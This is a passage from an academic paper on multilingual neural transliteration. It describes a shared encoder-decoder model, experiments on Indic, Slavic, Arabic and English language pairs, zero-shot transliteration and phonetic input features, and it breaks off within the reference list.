The other group tries to learn more compact networks with little special- ization across languages by using a joint vocabu- lary (Johnson et al., 2017; Lee et al., 2017). For multilingual transliteration, we adopt an approach that is closer to the latter group since the languages under consideration use compatible scripts result- ing in a shared vocabulary. We specialize just the output layer for target languages, but share the en- coder, decoder and character embeddings across lan- guages. In this respect, we differ from Johnson et al. (2017). They share all network components across languages, but add an artificial token at the begin- ning of the input sequence to indicate the target lan- guage. Zeroshot Transliteration We use the multilin- gual models to address zeroshot transliteration. Ze- roshot transliteration using bridge/pivot language has been explored for statistical machine transliter- ation (Khapra et al., 2010) as well as neural ma- chine transliteration (Saha et al., 2016). Unlike pre- vious approaches which pivot over bilingual translit- eration models, we propose zeroshot transliteration that pivots over multilingual transliteration mod- els. We also propose a direct zeroshot transliter- ation method, a scenario which has been explored for machine translation by Johnson et al. (2017), but not investigated previously for transliteration. In our zeroshot model, sequences from multiple source languages are mapped to a common encoder rep- resentation without the need for a parallel corpus between the source languages. Another work, the correlational encoder-decoder architecture (Saha et al., 2016), maps source and pivot languages to a common space but requires a source-pivot parallel transliteration corpus. 3 Multilingual Transliteration Learning We first formalize the multilingual transliteration task and then describe our proposed solution. 305 Shared LSTM Decoder Shared CNN Encoder Shared Character Embedding Layer L1 Output Layer Shared Attention Network T E N D U L K A R त ◌े ◌ं द ◌ु ल क र L2 Output Layer ത െ◌ ൻ ഡ ◌ു ൽ ക ◌് ക ർ context vector previous state & output annotation vectors (a) Network Architecture E R N A K U L A M Convolution (with same padding) + ReLU stride=1 Character embeddings Output of convolution Max Pooling (with same padding) stride=1 Annotation vectors Filter width=4 Pool width=4 Filter width=3 (b) CNN Encoder Figure 1: Multilingual Neural Transliteration Architecture 3.1 Task Definition The multilingual transliteration task involves learn- ing transliteration models for l language pairs (si, ti) ∈ L (i = 1 to l), where L ⊂ S × T , and S, T are sets of source and target languages respectively. The languages in each set are orthographically simi- lar. S and T need not be mutually exclusive. We are provided with parallel transliteration cor- pora for these l language pairs (Di, ∀i = 1 to l). The goal is to learn a joint transliteration model for all language pairs which minimizes an appropriate loss function over all the transliteration corpora. M ∗ = argmin M L(M, D) (1) where M is the candidate joint transliteration model and D=(D1, D2, ..., Dl) is training data for all lan- guage pairs, L is the training loss function given the model and the training data. We focus on 3 practical training scenarios: Similar source languages: We have multiple ortho- graphically similar source languages and a single tar- get language which is not similar to the source lan- guages. This is an instance of many-to-one learning, e.g., Indic languages to English. Similar target languages: We have multiple or- thographically similar target languages and a single source language which is not similar to the target lan- guages. This is an instance of one-to-many learning, e.g., English to Indic languages. All similar languages: We have multiple source languages as well as target languages, which are all orthographically similar. This is an instance of many-to-many learning, e.g., Indic-Indic languages. 3.2 Proposed Solution We propose a neural encoder-decoder model for multilingual transliteration. For each source-target language pair (s, t), the network models Ps,t = p(ytj |ytj−1...yt1, xs), where xs is the input character sequence and ytj is j th element of the output charac- ter sequence yt. Note that we design a single network to represent all the Ps,t distributions corresponding to the set of language pairs L. Our network is an adaptation of the standard encoder-decoder model with attention (Bahdanau et al., 2015). We describe only the salient aspects of our network and refer the reader to Bahdanau et al. (2015) for the basic encoder-decoder architecture. Figure 1a shows the network architecture of our multilingual translitera- tion system. Encoder & Decoder: We used a CNN encoder to encode the character sequence. It consists of a single convolutional layer (stride size = 1 and SAME padding), followed by ReLU units and max pooling. We use filters of different sizes and con- catenate their output to produce the encoder out- put. Figure 1b shows a schematic of the encoder. We chose CNN over the conventional bidirectional 306 LSTM layer since the temporal dependencies for transliteration are mostly local, which can be han- dled by the CNN encoder. We observed that train- ing and decoding are significantly faster, with little impact on accuracy. The decoder contains a layer of LSTM cells and their start state is the average of the encoder’s output vectors (Sennrich et al., 2017). Parameter Sharing: The vocabulary of the ortho- graphically similar languages (at input and/or out- put) is comprised of the union of character sets of all these languages. Since the character set of these lan- guages overlaps to a large extent, we share their char- acter embeddings too. The encoder is shared across all source languages and the decoder is shared across all target languages. The network uses a shared attention mechanism. The attention network is comprised of a single feed- forward layer, which predicts the attention score given the previous decoder output, previous decoder state and encoder annotation vector. The output layer (a fully connected feedforward layer) transforms the decoder LSTM layer’s output to the size of the output vocabulary, and a softmax function is applied to convert the output scores to probabilities. Each target language has its own set of output layer parameters. Barring the output layer, all network parame- ters (input embeddings, output embeddings, at- tention layer, encoder and decoder) are shared across all similar languages. This allows maxi- mum transfer of information for multilingual learn- ing, while the output layer alone specializes for the specific target language. Compared to using a target language tag in the input sequence (Johnson et al., 2017), we believe our approach allows the language- specific parameters to directly influence the output characters. Training Objective and Model Selection: We minimize the average negative likelihood of paral- lel training corpora across all language pairs. We determined the hyperparameters which gave best re- sults on a validation set. After training the model for a fixed number of iterations (sufficient for conver- gence), we select the model with the maximum ac- curacy on the validation set for each language pair. For instance, if the model corresponding to the 32nd epoch reported maximum accuracy on the validation set for English-Hindi, this model was used for report- ing test set results for English-Hindi. We observed that this criterion performed better than choosing the model with least validation set loss over all language pairs. 4 Experimental Setup We describe our experimental setup. Network Details: The CNN encoder has 4 filters (widths 1 to 4) of 128 hidden units each in the con- volutional layer (encoder output size=512). We use a stride size of 1 and the SAME padding for the convolutional and max-pooling layers. The decoder is a single layer of 512 LSTM units. We used the same configuration for both bilingual and multilin- gual experiments across all datasets for convenience after exploration on some language pairs. We apply dropout (Srivastava et al., 2014) (probability=0.5) at the output of the encoder and decoder, and SGD with the ADAM optimizer (Kingma and Ba, 2014) (learn- ing rate=0.001). We trained our models for a max- imum of 40 epochs (which we found sufficient for our models to converge) and a batch size of 32. In each training epoch, we cycle through the parallel corpora of each language pair. The parallel corpora are roughly of the same size. Better training sched- ules could be explored in future. Languages: We experimented with two sets of or- thographically similar languages: Indian languages: (i) Hindi (hi), Bengali (bn) from the Indo-Aryan branch of Indo-European fam- ily (ii) Kannada (kn), Tamil (ta) from the Dravid- ian family. We studied Indic-Indic transliteration and transliteration involving a non-Indian language (English↔Indic). We mapped equivalent characters in different Indic scripts in order to build a common vocabulary based on the common offsets of the Uni- code codepoints (Kunchukuttan et al., 2015). Slavic languages: Czech (cs), Polish (pl), Slovenian (sl) and Slovak (sk). We studied Arabic↔Slavic transliteration. Arabic is a non-Slavic language (Semitic branch of Afro-Asiatic) and uses an abjad script in which vowel diacritics are omitted in gen- eral usage. The languages chosen are representative of lan- guages spoken by some major groups of peoples 307 en-Indic Indic-en Indic-Indic ar-Slavic en-hi 12K hi-en 18K bn kn ta ar-cs 15K en-bn 13K bn-en 12K hi 3620 5085 5290 ar-pl 15K en-kn 10K kn-en 15K bn 2720 2901 ar-sl 10K en-ta 10K ta-en 15K kn 4216 ar-sk 10K Table 1: Training set statistics for different datasets (number of word pairs). Validation set: 1K (en→Indic & ar↔Slavic), 500 (Indic→en, Indic-Indic). Test set: 1K (all pairs). Pair Src Tgt en-hi KANAKLATA कनकलता (kanakalatA) en-kn LEHMANN ಹಮ (l.ehaman) (a) English-Indic Pair Src Tgt pl-ar DUMITRESCU دومیرتسكو (dwmytrskw) cs-ar MAURICE موریس (mwrys) (b) Slavic-Arabic Table 2: Examples of transliteration pairs from our datasets which exhibit orthographic similarity: Indic, Ro- mance, Germanic, Slavic, etc. These languages are spoken by around 2 billion people. So our approach addresses a major chunk of the world’s people. Datasets: (See Table 1 for statistics of datasets). We used the official NEWS 2015 shared task dataset (Banchs et al., 2015) for English to Indic transliteration. This dataset has been used for many editions of the NEWS shared tasks. We split the NEWS 2015 training dataset as the train and valida- tion data for Indic-English transliteration. For test- ing, we used the NEWS 2015 dev-test set. We cre- ated the Indian-Indian parallel transliteration corpora from the English to Indian language training corpora of the NEWS 2015 dataset by mining name pairs which have English names in common. We mined the Arabic-Slavic dataset from Wiki- data (Vrandečić and Krötzsch, 2014), a structured knowledge base containing items (roughly entities of interest). Each item has a label (title of item page) which is available in multiple languages. We ex- tracted labels from selected items referring to named entities (persons, organizations and locations) to en- sure that we extract parallel transliterations (as op- posed to translations). Pair P B M Pair P B M Similar Source and Target Languages Indic-Indic (45.5%) bn-hi 29.74 19.08 27.69 kn-bn 28.59 24.04 37.47 bn-kn 17.62 18.14 27.74 kn-ta 34.89 30.85 38.30 hi-bn 29.92 25.46 39.15 ta-hi 29.07 19.24 28.97 hi-ta 25.15 28.62 38.70 ta-kn 26.99 19.86 29.06 Similar Source Languages Slavic-Arabic (55.8%) Indic-English (24.2%) cs-ar 38.91 37.10 59.17 bn-en 55.23 48.93 54.01 pl-ar 34.70 34.80 44.83 hi-en 49.19 38.26 51.11 sk-ar 43.26 37.49 62.21 kn-en 42.79 33.77 47.70 sl-ar 41.90 36.74 62.04 ta-en 33.93 23.22 25.93 Similar Target Languages Arabic-Slavic (176.8%) English-Indic (1.1%) ar-cs 15.41 12.08 36.76 en-bn 42.90 41.70 46.10 ar-pl 13.68 12.26 24.21 en-hi 60.50 64.10 60.70 ar-sk 15.24 13.82 38.72 en-kn 48.70 52.00 53.90 ar-sl 18.31 13.63 44.35 en-ta 52.90 57.80 55.30 Table 3: Comparison of bilingual (B) and multilin- gual (M) neural models as well as bilingual PBSMT (P) models (top-1 accuracy %). Figure in brackets for each dataset shows average increase in translit- eration accuracy for multilingual neural model over bilingual neural model. Best accuracies for each lan- guage pair in bold. Evaluation: We use top-1 exact match accuracy as the evaluation metric (Banchs et al., 2015). This is one of the metrics in the NEWS shared tasks on transliteration. 5 Results and Discussion We discuss and analyze the results of our experi- ments. 5.1 Quantitative Observations Table 3 compares results of bilingual (B) and mul- tilingual (M) neural models as well as a bilingual transliteration system (P) based on phrase-based sta- tistical machine transliteration (PBSMT). The PB- SMT system was trained using Moses (Koehn et al., 2007) with no lexicalized reordering and uses mono- tonic decoding. We used a 5-gram character lan- guage model trained with Witten-Bell smoothing. We observe that multilingual training substan- tially improves the accuracy over bilingual training in all datasets (an average increase of 58.2% over all 308 language pairs). Transliteration accuracy increases in all scenarios: (i) similar sources (ii) similar tar- gets and (iii) similar sources & targets. If we look at results for various language groups, transliteration involving Slavic languages and Ara- bic benefits more than transliteration involving In- dic languages and English. Arabic→Slavic translit- eration shows maximum improvement (average: 176.8%) while English→Indic pairs show minimum improvement (average: 1.1% ). We also see that the multilingual model shows significant improvements over a bilingual translit- eration system based on phrase-based SMT. The PBSMT system is better than the bilingual neural transliteration system in most cases. This is consis- tent with previous work (Finch et al., 2015), where the standard encoder-decoder architecture (with at- tention mechanism) (Bahdanau et al., 2015) could not outperform PBSMT approaches. However, a model using target bidirectional LSTM with model ensembling (Finch et al., 2016) outperforms PBSMT models. These improvements are orthogonal to our work and could be used to further improve the bilin- gual as well as multilingual systems. The bilingual neural network models are not able to outperform the PBSMT models possibly due to the small size of the datasets and the limited depth of the network (single layer encoder and decoder). 5.2 Qualitative Observations We see that multilingual transliteration is better than bilingual transliteration in the following aspects: • Vowels are generally a major source of translit- eration errors (Kumaran et al., 2010; Kunchukut- tan and Bhattacharyya, 2015) because of ambigui- ties in vowel mappings. We see a major decrease in vowel errors due to multilingual training (aver- age decrease of ∼20%). We observe substantial de- crease in long-short vowel confusion errors (Indic languages as target languages) and insertion/deletion of A (English/Slavic as target). We also see a ma- jor improvement in Arabic→Slavic transliteration. The Arabic script does not represent vowels, hence the transliteration system needs to correctly generate vowels. The multilingual model is better at generat- ing vowels compared to the bilingual model. • We also observe that consonants with similar pho- netic properties are a major source of transliteration Source B M باستور (bAstwr) bastor pastor كیلني (kylyn) kelen kailin (a) Arabic-Czech examples Source B M व जर्ल (varjila) vergill virgil ए लसन (elisana) elissan ellison (b) Hindi-English examples Table 4: Examples of bi- vs. multi-lingual outputs. ar and hi text are also shown using Buckwalter and ITRANS romanization schemes respectively errors, and these show a substantial decrease with multilingual training. For Indic-English translitera- tion, we see substantial error reduction in the follow- ing character pairs K-C, T-D, P-B. We also observe a decrease in confusion between aspirated and unaspi- rated sounds. For Arabic→Slavic transliteration, we see substantial error reduction for the following char- acter pairs K-C, F-V and P-B. • For Slavic→Arabic, we observed a significant re- duction in the number of errors related to characters representing fricative sounds like j,s,z,g (Buckwalter romanization). • The multilingual system seems to prefer the canon- ical spellings, even when other alternative spellings seem faithful to the source language phonetics. The system is thus able to learn conventional usage better than the bilingual models. e.g. morisa (Hindi, ro- manized text shown) is transliterated incorrectly to the phonetically acceptable English word moris by the bilingual model. The multilingual model gener- ates the correct system Maurice. • Since Indic scripts are very phonetic, very few non-canonical spellings are possible. As a conse- quence, vowel error reduction was also minimum for English-Indic transliteration (10%). This may partly explain why multilingual training provides minimal benefit for English-Indic transliteration. Table 4 shows some examples where multilingual output is better than the bilingual output. 309 Figure 2: Visualization of contextual representations of vowels for hi-en transliteration. Each colour rep- resents a different vowel. 5.3 Analysis We investigated a few hypotheses to understand why multilingual models are better: Better contextual representations for vowels: We hypothesize that the encoder learns better contex- tual representations for vowels. To test this hypoth- esis, we studied 3 character long sequences from the test set with a vowel in the middle (i.e., 1-char win- dow around vowel). We processed these sequences through the encoder of the bilingual and multilin- gual transliteration systems to generate the encoder output corresponding to the vowels. For instance, for the vowel a in the word part, we encode the 3 character sequence par using the encoder. The en- coder output corresponding to the character a is con- sidered the contextual representation of the charac- ter a in this word. Figure 2 shows a visualization of these contextual representations of the vowels using t-SNE (van der Maaten and Hinton, 2008). For the bilingual model, we observe that the contextual rep- resentations of same vowels tend to cluster together. For the multilingual model, the clustering is more specialized. The representations are grouped by the vowel along with the context. For instance, the re- gion highlighted in the plot shows representations of Hindi vowels e (yellow) and i (blue) followed by the consonant v. Other vowels with the same context are seen in the same region too. This suggests that the multilingual model is able to learn specialized rep- resentations of vowels in different contexts and this helps the decoder generate correct transliterations. More monolingual data: In the many-one scenario, more monolingual data is available for the target lan- guage since target words from all training language pairs are available. We hypothesize that this may help the decoder to better model the target language sequence. To test this, we decoded the test data using the bilingual models along with a larger target RNN LM (with LSTM units) using shallow fusion (Gul- cehre et al., 2017). The RNN LM was trained on all the target language words across all parallel cor- pora. These experiments were performed for Indic- English and Slavic-Arabic pairs. We did not observe any major change in the transliteration accuracies of bilingual models due to integration of a larger LM. Thus, larger target side data does not explain the im- provement in transliteration accuracy due to multi- lingual transliteration. More parallel data: Multilingual training pools to- gether parallel corpora from multiple orthographi- cally similar languages, which effectively increases the data available for training. To test if this ex- plains the improved performance, we compared mul- tilingual and bilingual models under similar data size conditions, i.e., the total parallel corpora size across all language pairs used to train the multilin- gual model is equivalent to the size of the bilingual corpus used to train the bilingual model. Specifically we compared the following under similar data size conditions: (a) {bn,hi,kn,ta}-en multilingual model (50%hi-en training pairs) withhi-enbilingual model (b) {cs,pl,sk,sl}-ar multilingual model (30% pl-ar training pairs) with pl-ar bilingual model. Table 5 shows the results of these experiments. We ob- served that the multilingual system showed signif- icantly higher transliteration accuracy compared to the bilingual model for Polish-Arabic. For Hindi- English, the bilingual model was better than the mul- tilingual model. So, we cannot decisively conclude that the performance improvement of multilingual transliteration can be attributed to the effective in- crease in training data size. In a multilingual train- ing scenario, data from other languages act as noisy 310 Pair B M pl-ar 14.64 44.83 hi-en 38.26 35.93 Table 5: Results of experiments under balanced data conditions Pair sepdec sepout sepnone Pair sepdec sepout sepnone Indic-Indic bn-hi 27.28 27.69 28.72 kn-bn 32.22 37.47 35.76 bn-kn 25.86 27.74 27.11 kn-ta 40.06 38.30 40.37 hi-bn 37.22 39.15 39.35 ta-hi 27.74 28.97 28.45 hi-ta 35.74 38.70 35.54 ta-kn 28.13 29.06 28.65 Arabic-Slavic English-Indic ar-cs 39.68 36.76 35.95 en-bn 41.00 46.10 44.10 ar-pl 27.25 24.21 26.85 en-hi 56.00 60.70 61.60 ar-sk 41.36 38.72 40.14 en-kn 49.30 53.90 54.30 ar-sl 49.14 44.35 45.88 en-ta 53.00 55.30 52.90 Table 6: Comparison of multilingual architectures version of data from the original language and sup- plement the available bilingual data, but they can- not necessarily substitute data from the original lan- guage pair. 5.4 Comparison with variant architectures We compare three variants of the encoder-decoder architecture: (a) our model: target language specific output layer (and parameters) (sepout), (b) every tar- get language has its own decoder and output layer (sepdec) (Lee et al., 2017), and (c) all languages share the same decoder and output layer, but the first to- ken of the input sequence is a special token to spec- ify target language (sepnone) (Johnson et al., 2017). These architectures differ in the degree of parameter sharing. sepdec has fewer shared parameters than our model and sepnone has more shared parameters than our model. In all three cases, the encoder is shared across all source languages. Table 6 shows the re- sults of this comparison. We cannot definitively con- clude if one model is better than the other. Except for Arabic-Slavic transliteration, the trend seems to indicate that models with greater parameter sharing (sepout/sepnone) may perform better. In any case, given the comparable results we prefer models with fewer model parameters (sepout/sepnone). 6 Zeroshot Transliteration In the previous sections, we have shown that multi- lingual training is beneficial for language pairs ob- served during training. In addition, the encoder- decoder architecture opens up the possibility of ze- roshot transliteration i.e., transliteration between language pairs that have not been seen during train- ing. The encoder-decoder architecture decouples the source and target language network compo- nents and makes the architecture more modular. As a consequence, we can consider the encoder out- put (for the source language) to be embedded in a language-neutral, common subspace - a sort of inter- lingua. The decoder proceeds to generate the target word from the language neutral representation of the source word. Hence, training on just a few language pairs is sufficient to learn all language-specific pa- rameters - making zeroshot transliteration possible. Before describing different zeroshot translitera- tion scenarios, we introduce a few terms. A language that is the source in any language pair seen during training is said to be source-covered. We can define target-covered languages analogously. Now, we can envisage the following zeroshot transliteration sce- narios: (a) unseen language pairs: both the source and target languages are covered, but the pair was not observed during training, (b) unseen source lan- guage: the source language is not covered, but it is orthographically similar to other source-covered lan- guages, (c) unseen target language: can be defined analogously. Next, we describe our proposed solu- tions to these scenarios. 6.1 Unseen Language Pair We investigated the following solutions: Multilingual Zeroshot-Direct: Since source and target languages are covered, we use the trained mul- tilingual model discussed in previous sections for source-target transliteration. Model selection can be an issue for this approach. As discussed earlier, model selection using valida- tion set accuracy for each language pair is better than average validation set loss. For an unseen language pair, we cannot use validation set accuracy/loss for model selection (since validation data is not avail- able). So we explored the following model selection criterion: maximum average validation set accuracy 311 across all the trained language pairs (sc_acc). We also compared sc_acc to the model with least av- erage validation set loss over all training language pairs (sc_loss). Nevertheless, there are inherent limitations to model selection by averaging validation accuracy or loss for trained language pairs. Irrespective of the model selection method used, the chosen model may still be suboptimal for unseen language pairs since the network is not optimized for such pairs. Multilingual Zeroshot-Pivot: To address the limi- tations with zeroshot-direct transliteration, we pro- pose transliteration from source to target using a pivot language, and pipelining the best source-pivot and pivot-target transliteration models. We choose a pivot language such that the network has been trained for source-pivot and pivot-target pairs. Since the network has been trained for the source-pivot and target-pivot pairs, we can expect optimal perfor- mance in each stage of the pipeline. Note thatweuse the multilingual model for source-pivot and pivot- target transliteration (we found it better than using the bilingual models). To reduce cascading errors due to pipelining, we consider the top-k source-pivot transliterations in the next stage of the pipeline. The probability for a target word y given the source word x is computed as: p(y|x) = k∑ i=1 p(y|zi)p(zi|x) (2) zi: ith best source-pivot transliteration. We used k=10. 6.2 Unseen Source Language An unseen source language can be easily handled in our architecture. Though the language has not been source-covered, a source word can be directly processed through the network since all source lan- guages share the encoder and character embeddings. 6.3 Unseen Target Language Handling an unseen target language is tricky since the output layer is specific to each target language. Hence, parameters for the unseen language’s output layer cannot be learned during training. Note that even architectures where the entire network is com- pletely shared between all language pairs (Johnson et al., 2017) cannot handle an unseen target language - Pair Biling Zeroshot ZeroshotDirect Pivoting † Direct sc_acc sc_loss sc_ora bn-ta 16.20 36.12 (hi) 31.79 27.45 34.47 ta-bn 18.48 47.01 (hi) 24.87 17.97 25.28 hi-kn 34.66 47.14 (ta) 44.48 42.13 43.05 kn-hi 34.12 39.02 (ta) 40.45 37.28 40.96 † best pivot for multilingual pivoting in brackets (a) Unseen language pair Method Slavic-ar (cs-ar) Indic-en (hi-en) Bilingual 37.10 38.26 Zeroshot 60.48 45.24 Multilingual 59.17 51.11 (b) Unseen source language Method ar-Slavic (ar-cs) en-Indic (en-hi) proxy acc proxy acc Bilingual none 12.08 none 64.10 sk 42.09 kn 9.00 Proxy sl 41.89 bn 18.30 pl 38.27 ta 2.90 Proxy sk 42.20 kn 9.70 + sl 40.99 bn 18.10 LMFusion pl 36.35 ta 3.10 (c) Unseen target language Table 7: Results for zeroshot transliteration the embedding for target language indicator tokens are not learned during training for unseen target lan- guages. We found that simple approaches like as- signing parameters for unseen target languages by averaging the parameters of the trained target lan- guages do not work. Hence, we use a target-covered language as proxy for the unseen target language. The simplest ap- proach considers the output of the source to proxy language transliteration system as the target lan- guage’s output. However, this doesn’t take into ac- count phonotactic characteristics of the target lan- guage. We propose to incorporate this information by using an RNN (using LSTM units) character-level language model of the target language words. While predicting the next output character during decoding, we combine the scores from the multilingual translit- eration model and the target LM using shallow fu- sion of the transliteration model and the language model (Gulcehre et al., 2017). 312 6.4 Results and Discussion We discuss the results for each scenario below. 6.4.1 Unseen language pair We experimented with transliteration between four Indic languages viz., hi,bn,ta,kn. We trained a mul- tilingual model on 8 out of the 12 possible language pairs, covering all the 4 languages. The remaining 4 language pairs (ta-bn, bn-ta, hi-kn and hi-kn) are the unseen language pairs (results in Table 7a). Zeroshot vs. Direct Bilingual: For all unseen lan- guage pairs, all zeroshot systems (pivot as well dif- ferent direct configurations) are better than the di- rect bilingual system. Note that unlike the zeroshot systems, the bilingual systems were directly trained on the unseen language pairs. Yet the zeroshot sys- tems outperform direct bilingual systems since the underlying multilingual models are significantly bet- ter than the bilingual models (as seen in Section 5). These results show that the multilingual model gen- eralizes well to unseen language pairs. Direct vs. Pivot Zeroshot: We also observe that the pivot zeroshot system is better than both of the direct zeroshot systems (sc_acc and sc_loss). To verify if the limitations of the model selection criterion ex- plain the direct system’s relatively lesser accuracy, we also considered an oracle direct zeroshot system (sc_ora). The oracle system selects the model with the best accuracy using a parallel validation corpus for the unseen language pair. This oracle system is also inferior to the pivot transliteration model. So, we can conclude that the network is better tuned for transliteration of language pairs it has been directly trained on. Hence, multilingual pivoting works bet- ter than direct transliteration in spite of the cascading errors involved in pipelining. Model Selection Criteria: For the direct zeroshot system, the average accuracy (sc_acc) is a better model selection criterion than average loss (sc_loss). 6.4.2 Unseen source language We conducted 2 experiments: (a) train on (bn,kn,ta)- en pairs and test on hi-en pair, and; (b) train on (pl,sk,sl)-ar pairs and test on cs-ar pair. See Table 7b for results. In this scenario, too, we observe that zeroshot transliteration performs better than direct bilingual transliteration. In fact, zeroshot transliter- ation is competitive with multilingual transliteration too (accuracy is > 90% of multilingual translitera- tion). Though the network has not seen the source language, the encoder is able to generate source lan- guage representations that are useful for decoding. 6.4.3 Unseen target language We conducted 2 experiments: (a) train on ar- (pl,sk,sl) pairs and test on ar-cs pair, and;(b) train on en-(bn,kn,ta) pairs and test on en-hi pair. The target languages used in training were the proxy languages. See Table 7c for results. We observe contradictory results for the experi- ments. For ar-cs, the use of proxy language gives transliteration results better than bilingual transliter- ation. But, the proxy language is not a good substi- tute for Hindi. Shallow fusion of target LM with the transliteration model makes little difference. We see that the transliteration performance of proxy languages is correlated to its orthographic sim- ilarity to the target language. Thus, it is preferable to choose a proxy with high orthographic similar- ity to the target language. We see one anomaly to this trend. Kannada as proxy performs badly com- pared to Bengali, though Kannada is orthographi- cally more similar to Hindi. One reason could be the orthographic convention in Hindi and Bengali that the terminal vowel is automatically suppressed. In Kannada, the vowel has to be explicitly suppressed with a terminal halanta character. Simply deleting theterminalhalanta in Kannadaoutput to conform to Hindi conventions increases accuracy to 24.1% (bet- ter than Bengali). Clearly, shallow fusion is not suf- ficient to adapt a proxy language’s output to the tar- get language, and further investigations are required. If a proxy-target corpus is available, we can generate better transliterations via pivoting. 7 Incorporating Phonetic Information So far, we considered characters as atomic units. We have thus relied on correspondences between charac- ters for multilingual learning. In addition, for some languages, we can find an almost one-one correspon- dence from the characters to phonemes (a basic unit of sound). Each phoneme can be factorized into a set of articulatory properties like place of articulation, nasalization, voicing, aspiration, etc. If the input for transliteration incorporates these phonetic prop- erties, it may learn better character representations 313 Pair O Ph Pair O Ph Indic- bn-en 54.01 55.53 kn-en 47.70 53.31 English hi-en 51.11 54.86 ta-en 25.93 29.63 bn-hi 27.69 28.51 kn-bn 37.47 39.19 Indic- bn-kn 27.74 29.72 kn-ta 38.30 41.93 Indic hi-bn 39.15 37.73 ta-hi 28.97 29.17 hi-ta 38.70 39.00 ta-kn 29.06 31.54 Table 8: Onehot (O) vs. phonetic (Ph) input across languages by bringing together similar char- acters. e.g. the Kannada character ಳ (La), has no Hindi equivalent character, but the Hindi character ल (la) is the closest character. The two characters differ in terms of one phonetic feature (the retroflex property), which can be represented in the phonetic input and can serve to indicate the similarity between the two characters. We incorporated phonetic features in our model by using feature-rich input vectors instead of the con- ventional onehot vector input for characters. Our phonetic feature input vector is a bitvector encod- ing the phonetic properties of the character, one bit for each value of every property. The multiplication of the phonetic feature vector with the weight ma- trix in the first layer generates phonetic embeddings for each character. These are inputs to the encoder. Apart from this input change, the rest of the network architecture is the same as described in Section 3.2. Experiments: We experimented with Indian lan- guages (Indic→English and Indic-Indic translitera- tion). Indic scripts generally have a one-one cor- respondence from characters to phonemes. Hence, we use phonetic features described by Kunchukut- tan et al. (2016) to generate phonetic feature vectors for characters (available via the IndicNLPLibrary1). These Indic languages are spoken by nearly a billion people and hence the use of phonetic features is use- ful for many of the world’s most widely spoken lan- guages. Results and Discussion: Table 8 shows the results. We observe that phonetic feature input improves transliteration accuracy for Indic-English transliter- ation. The improvements are primarily due to reduc- tion in errors related to similar consonants like (T,D), (P,B), (C,K) and the use of H for aspiration. 1https://github.com/anoopkunchukuttan/indic_ nlp_library For Indic-Indic transliteration, we see moderate improvement in transliteration accuracy due to pho- netic feature input. Since the source as well as tar- get scripts are largely phonetic, phonetic representa- tion may not be useful in resolving ambiguities (un- like Indic-English transliteration). Again, we see im- provements due to reduction of errors related to sim- ilar consonants. 8 Conclusion and Future Work We show that multilingual training using a neural encoder-decoder architecture significantly improves transliteration involving orthographically similar languages compared to bilingual training. Our key idea is maximal sharing of network components in order to utilize high task relatedness on account of orthographic similarity. The primary reasons for the improvements could be: (a) learning of specialized representations by the shared encoder and; (b) abil- ity to learn canonical spellings. We also show that the multilingual transliteration models can general- ize well to language pairs not encountered during training and observe that zeroshot transliteration can outperform direct bilingual transliteration in many cases. Moreover, multilingual transliteration can be further improved by shared phonetic input. Transliteration is an example of a sequence to se- quence task which is characterized by the follow- ing properties: (a) small vocabulary (b) short se- quences (c) monotonic transformation (d) unequal source and target sequence length (e) significant vo- cabulary overlap across languages. Given the bene- fits we have shown for multilingual transliteration, other NLP tasks that can be characterized simi- larly (viz., grapheme to phoneme conversion, trans- lation of short text like tweets and headlines between related languages at subword level, and possibly speechrecognitionaswellasTTS)couldalsobenefit from multilingual training. 9 Acknowledgements We would like to thank Rudramurthy V for making available code for parsing Wikidata and extracting multilingual named entities. We would also like to thank the action editor and reviewers for their valu- able comments. 314 References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learn- ing to align and translate. In International Conference on Learning Representations. Rafael E. Banchs, Min Zhang, Xiangyu Duan, Haizhou Li, and A. Kumaran. 2015. Report of NEWS 2015 Machine Transliteration Shared Task. In Proceedings of the Fifth Named Entities Workshop. Maximilian Bisani and Hermann Ney. 2008. Joint- sequence models for grapheme-to-phoneme conver- sion. Speech Communication. Rich Caruana. 1997. Multitask learning. Machine learn- ing. Daxiang Dong, Hua Wu, Wei He, Dianhai Yu, and Haifeng Wang. 2015. Multi-Task learning for mul- tiple language translation. In Annual Meeting of the Association for Computational Linguistics. Andrew Finch and Eiichiro Sumita. 2010. A Bayesian model of bilingual segmentation for transliteration. In InternationalWorkshoponSpokenLanguageTransla- tion. Andrew Finch, Lemao Liu, Xiaolin Wang, and Eiichiro Sumita. 2015. Neural network transduction models in transliteration generation. In Proceedings of the Fifth Named Entities Workshop. Andrew Finch, Lemao Liu, Xiaolin Wang, and Eiichiro Sumita. 2016. Target-Bidirectional neural models for machine transliteration. In Proceedings of The Sixth Named Entities Workshop. Orhan Firat, Kyunghyun Cho, and Yoshua Bengio. 2016. Multi-way, multilingual neural machine translation with a shared attention mechanism. In Conference of the North American Chapter of the Association for Computational Linguistics. Dan Gillick, Cliff Brunk, Oriol Vinyals, and Amarnag Subramanya. 2016. Multilingual language process- ing from bytes. In Conference of the North American Chapter of the Association for Computational Linguis- tics. Caglar Gulcehre, Orhan Firat, Kelvin Xu, Kyunghyun Cho, and Yoshua Bengio. 2017. On integrating a lan- guage model into Neural Machine Translation. Com- puter Speech and Language. Junqing He, Long Wu, Xuemin Zhao, and Yonghong Yan. 2017. HCCL at SemEval-2017 Task 2: Combin- ing multilingual word embeddings and transliteration model for semantic similarity. In Proceedings of the 11th International Workshop on Semantic Evaluation. Jagadeesh Jagarlamudi and Hal Daumé III. 2012. Reg- ularized interlingual projections: Evaluation on mul- tilingual transliteration. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natu- ral Language Processing and Computational Natural Language Learning. Sittichai Jiampojamarn, Colin Cherry, and Grzegorz Kon- drak. 2008. Joint processing and discriminative train- ing for letter-to-phoneme conversion. In Annual Meet- ing of the Association for Computational Linguistics. Sittichai Jiampojamarn, Aditya Bhargava, Qing Dou, Kenneth Dwyer, and Grzegorz Kondrak. 2009. Di- recTL: A language-independent approach to translit- eration. In Proceedings of the 2009 Named Entities Workshop: Shared task on transliteration. Melvin Johnson, Mike Schuster, Quoc V. Le, Maxim Krikun, Yonghui Wu, Zhifeng Chen, Nikhil Thorat, Fernanda B. Viégas, Martin Wattenberg, Greg Cor- rado, Macduff Hughes, and Jeffrey Dean. 2017. Google’s multilingual neural machine translation sys- tem: Enabling zero-shot translation. Transactions of the Association for Computational Linguistics. Sarvnaz Karimi, Falk Scholer, and Andrew Turpin. 2011. Machine transliteration survey. ACM Computing Sur- veys. Mitesh M. Khapra, A. Kumaran, and Pushpak Bhat- tacharyya. 2010. Everybody loves a rich cousin: An empirical study of transliteration through 